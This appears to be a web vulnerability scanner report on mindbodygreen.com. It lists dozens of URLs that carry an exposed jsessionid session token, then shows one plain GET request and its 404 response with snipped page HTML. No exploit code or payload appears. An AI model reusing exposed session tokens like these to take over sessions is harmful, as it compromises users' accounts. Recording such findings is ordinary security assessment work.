http://www.mindbodygreen.com/tag/beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/books.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/celebrity.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/chefs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/chicago.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/cleanse.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/culture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/dalai-lama.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/dan-barber.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/david-lynch.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/deepak-chopra.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/detox.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/eco-fashion.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/eco-travel.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/feng-shui-tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/fitness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/food-trucks.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/gift-guide.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/gisele-bundchen.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/goal-setting.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/grocery-shopping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/gwyneth-paltrow.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/happiness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/healthy-foods.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/healthy-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/hillary-biscay.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/home.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/infographic.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/inspiration.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/jamie-oliver.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/kathryn-budig.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/kindness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/kombucha.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/link-love.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/los-angeles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/madonna.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/michael-pollan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/michael-taylor.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/mind-body-connection.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/mindfulness-meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/new-york-city.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/oprah.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/organic-food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/partnered-posts.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/paulo-coelho.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/personal-growth-quotes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/personal-growth.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/pilates.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/pro-athletes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/product-reviews.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/quizzes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/relationships.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/restaurants.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/retreats.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/running.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/russell-simmons.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/san-francisco.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/sleeping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/slideshows.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/spirituality.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/study.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/tara-stiles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/tony-robbins.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/triathlon.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/vancouver-olympics.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/vegan-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/vegan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/visualization.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/weekly-roundup.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/weight-loss-success.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/wellness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/words-of-wisdom.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yoga-poses-moving.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yoga-poses-sequence.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yoga-poses-video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yoga-poses.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yoga.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/tag/yogis.html;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/termsofuse.jsp;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/ainscough-jess-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/barrett-jayme-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/biscay-hillary-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/brazier-brendan-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/budig-kathryn-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/claudat-dana-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/gonzalez-tony-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/johnson-brian-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/lipman-frank-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/reece-gabby-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/romanelli-dave-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/stiles-tara-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/taylor-michael-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/userimages/wachob-jason-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/brendan-brazier;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/brian-johnson;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/dana-claudat;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/david-romanelli;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/dr-frank-lipman;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/gabby-reece;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/hillary-biscay;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/jason-wachob;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/jayme-barrett;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/jess-ainscough;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/kathryn-budig;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/michael-taylor;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/tara-stiles;jsessionid=411392370C2802E8CD928A39CCA58AA0
http://www.mindbodygreen.com/wc/tony-gonzalez;jsessionid=411392370C2802E8CD928A39CCA58AA0

Request

GET /passvote.action HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en-US
Date: Tue, 25 Jan 2011 04:45:36 GMT
Connection: close

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
</title>
<link rel="alternate" type="application/rss+xml" title="MindBodyGreen - Mind/Body Wellness and Green Living Tips, News, and Interviews" href="/rss/feed.xml;jsessionid=411392370C2802E8CD928A39CCA58AA0" />
<link rel="stylesheet" type="text/css" href="/css/main.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="/css/featurepreviews.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="/css/wc.css;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<link rel="stylesheet" type="text/css" href="http://www.facebook.com/css/connect/connect_button.css" />
<link rel="Shortcut Icon" href="/favicon.ico;jsessionid=411392370C2802E8CD928A39CCA58AA0">
<script src="http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1" type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="/js/swfobject.js;jsessionid=411392370C2802E8CD928A39CCA58AA0"></script>
...[SNIP]...
<div id="logo-top">
           <a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/logo_symbols.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
       </div>
       <div id="logo-bottom">
           <a href="/;jsessionid=411392370C2802E8CD928A39CCA58AA0"><img src="/images/logo_text.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
       </div>
       <div id="leader">
           <img src="/images/tagline.png;jsessionid=411392370C2802E8CD928A39CCA58AA0" alt="Your Gateway to Wellness: Better, Healthier, Greener Living">
       </div>
...[SNIP]...
<div class="link" style="width:120px"><a href="/Personal-Growth/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Personal Growth</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:90px"><a href="/Spirituality/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Spirituality</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:110px"><a href="/Yoga-Pilates/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Yoga & Pilates</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:50px"><a href="/Food/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Food</a></div>
           <div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:64px"><a href="/Fitness/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Fitness</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:74px"><a href="/Wellness/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Wellness</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:54px"><a href="/Home/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Home</a></div>
           <div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div class="link" style="width:64px"><a href="/Culture/;jsessionid=411392370C2802E8CD928A39CCA58AA0">Culture</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:80px"><a href="/QandA;jsessionid=411392370C2802E8CD928A39CCA58AA0">Interviews</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:130px"><a href="/Beginners-Guides;jsessionid=411392370C2802E8CD928A39CCA58AA0">Beginners Guides</a>
...[SNIP]...
<div><img src="/images/nav_separator.gif;jsessionid=411392370C2802E8CD928A39CCA58AA0"></div><div class="link" style="width:78px"><a href="/tag/video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">Videos</a>
...[SNIP]...
<a href="http://travel.mindbodygreen.com"><img src="/images/travel-banner-300x250.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0"></a>
...[SNIP]...
<a href="http://www.youtube.com/user/MindBodyGreen" target="_blank"><img src="/images/youtube-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" style="height:49px"></img></a>
<a href="http://itunes.apple.com/us/podcast/mindbodygreen/id367278016" target="_blank"><img src="/images/itunes-logo.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" style="width:140px"></img>
...[SNIP]...
</div>
   <a href="/wc/tara-stiles;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/stiles-tara-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/dr-frank-lipman;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/lipman-frank-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/kathryn-budig;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/budig-kathryn-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/tony-gonzalez;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/gonzalez-tony-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/gabby-reece;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/reece-gabby-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/brian-johnson;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/johnson-brian-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/hillary-biscay;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/biscay-hillary-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/brendan-brazier;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/brazier-brendan-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/jess-ainscough;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/ainscough-jess-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/dana-claudat;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/claudat-dana-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/michael-taylor;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/taylor-michael-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/david-romanelli;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/romanelli-dave-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a href="/wc/jayme-barrett;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/barrett-jayme-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
</a>
   <a class="everyother" href="/wc/jason-wachob;jsessionid=411392370C2802E8CD928A39CCA58AA0">
       <div class="inner">
...[SNIP]...
<div class="image"><img src="/userimages/wachob-jason-sm.jpg;jsessionid=411392370C2802E8CD928A39CCA58AA0" /></div>
...[SNIP]...
<div style="float:left;width:145px;padding:0 2px 0 2px">

<a href="/tag/abs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">abs (24)</a><br/>

<a href="/tag/alice-waters.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">alice waters (10)</a><br/>

<a href="/tag/alicia-silverstone.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">alicia silverstone (10)</a><br/>

<a href="/tag/apps.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">apps (11)</a><br/>

<a href="/tag/beauty.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">beauty (72)</a><br/>

<a href="/tag/beginners.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">beginners (84)</a><br/>

<a href="/tag/books.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">books (97)</a><br/>

<a href="/tag/celebrity.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">celebrity (327)</a><br/>

<a href="/tag/chefs.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">chefs (57)</a><br/>

<a href="/tag/chicago.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">chicago (6)</a><br/>

<a href="/tag/cleanse.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">cleanse (18)</a><br/>

<a href="/tag/culture.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">culture (314)</a><br/>

<a href="/tag/dalai-lama.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">dalai lama (21)</a><br/>

<a href="/tag/dan-barber.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">dan barber (5)</a><br/>

<a href="/tag/david-lynch.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">david lynch (14)</a><br/>

<a href="/tag/deepak-chopra.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">deepak chopra (14)</a><br/>

<a href="/tag/detox.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">detox (19)</a><br/>

<a href="/tag/eco-fashion.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">eco-fashion (49)</a><br/>

<a href="/tag/eco-travel.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">eco-travel (58)</a><br/>

<a href="/tag/feng-shui-tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">feng shui tips (31)</a><br/>

<a href="/tag/fitness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">fitness (197)</a><br/>

<a href="/tag/food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">food (372)</a><br/>

<a href="/tag/food-trucks.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">food trucks (4)</a><br/>

<a href="/tag/gift-guide.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gift guide (18)</a><br/>

<a href="/tag/gisele-bundchen.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gisele bundchen (16)</a><br/>

<a href="/tag/goal-setting.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">goal setting (14)</a><br/>

<a href="/tag/grocery-shopping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">grocery shopping (97)</a><br/>

<a href="/tag/gwyneth-paltrow.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">gwyneth paltrow (12)</a><br/>

<a href="/tag/happiness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">happiness (47)</a><br/>

<a href="/tag/healthy-foods.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">healthy foods (210)</a><br/>

<a href="/tag/healthy-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">healthy recipes (66)</a><br/>

<a href="/tag/hillary-biscay.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">hillary biscay (5)</a><br/>

<a href="/tag/home.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">home (78)</a><br/>

<a href="/tag/infographic.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">infographic (34)</a><br/>

<a href="/tag/inspiration.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">inspiration (117)</a><br/>

<a href="/tag/jamie-oliver.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">jamie oliver (14)</a><br/>

<a href="/tag/kathryn-budig.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kathryn budig (12)</a><br/>

<a href="/tag/kindness.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kindness (24)</a><br/>

<a href="/tag/kombucha.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">kombucha (18)</a><br/>

<a href="/tag/link-love.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">link love (92)</a><br/>

<a href="/tag/los-angeles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">los angeles (87)</a><br/>

<a href="/tag/madonna.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">madonna (11)</a><br/>

<a href="/tag/meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">meditation (93)</a><br/>

<a href="/tag/michael-pollan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">michael pollan (16)</a><br/>

<a href="/tag/michael-taylor.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">michael taylor (88)</a>
...[SNIP]...
<div style="float:right;width:147px;padding-right:2px"><a href="/tag/mind-body-connection.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">mind body connection (79)</a><br/>

<a href="/tag/mindfulness-meditation.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">mindfulness meditation (64)</a><br/>

<a href="/tag/new-york-city.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">new york city (174)</a><br/>

<a href="/tag/oprah.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">oprah (14)</a><br/>

<a href="/tag/organic-food.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">organic food (108)</a><br/>

<a href="/tag/partnered-posts.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">partnered posts (13)</a><br/>

<a href="/tag/paulo-coelho.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">paulo coelho (5)</a><br/>

<a href="/tag/personal-growth.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">personal growth (284)</a><br/>

<a href="/tag/personal-growth-quotes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">personal growth quotes (165)</a><br/>

<a href="/tag/PETA.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">PETA (23)</a><br/>

<a href="/tag/pilates.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">pilates (38)</a><br/>

<a href="/tag/pro-athletes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">pro athletes (44)</a><br/>

<a href="/tag/product-reviews.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">product reviews (43)</a><br/>

<a href="/tag/quizzes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">quizzes (5)</a><br/>

<a href="/tag/relationships.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">relationships (38)</a><br/>

<a href="/tag/restaurants.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">restaurants (70)</a><br/>

<a href="/tag/retreats.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">retreats (9)</a><br/>

<a href="/tag/running.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">running (17)</a><br/>

<a href="/tag/russell-simmons.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">russell simmons (7)</a><br/>

<a href="/tag/san-francisco.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">san francisco (42)</a><br/>

<a href="/tag/sleeping.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">sleeping (17)</a><br/>

<a href="/tag/slideshows.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">slideshows (6)</a><br/>

<a href="/tag/spirituality.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">spirituality (199)</a><br/>

<a href="/tag/study.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">study (105)</a><br/>

<a href="/tag/tara-stiles.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tara stiles (11)</a><br/>

<a href="/tag/TED.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">TED (41)</a><br/>

<a href="/tag/tips.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tips (52)</a><br/>

<a href="/tag/tony-robbins.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">tony robbins (5)</a><br/>

<a href="/tag/triathlon.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">triathlon (16)</a><br/>

<a href="/tag/vancouver-olympics.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vancouver olympics (17)</a><br/>

<a href="/tag/vegan.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vegan (104)</a><br/>

<a href="/tag/vegan-recipes.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">vegan recipes (19)</a><br/>

<a href="/tag/video.html;jsessionid=411392370C2802E8CD928A39CCA58AA0">video (174)</a><br/>

